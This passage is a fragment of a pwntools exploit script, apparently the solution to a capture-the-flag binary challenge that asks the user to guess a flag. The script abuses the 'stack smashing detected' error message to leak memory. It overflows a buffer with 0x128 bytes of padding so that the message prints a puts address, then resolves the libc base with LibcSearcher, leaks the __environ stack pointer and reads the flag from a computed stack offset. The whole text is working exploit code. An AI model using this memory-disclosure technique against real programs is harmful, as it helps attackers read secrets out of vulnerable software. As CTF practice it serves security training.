p.recvuntil('*** stack smashing detected ***:')
puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))

libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr-libc.dump('puts')
environ_addr = libc_base + libc.dump('__environ')

pl2 = 'a'*0x128 + p64(environ_addr)
p.sendlineafter('Please type your guessing flag',pl2)
p.recvuntil('*** stack smashing detected ***:')
stack_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))

flag = stack_addr-0x168

pl3 = 'a'*0x128 + p64(flag)
p.sendlineafter('Please type your guessing flag',pl3)
# gdb.attach(p)
p.recv()
p.interactive()
```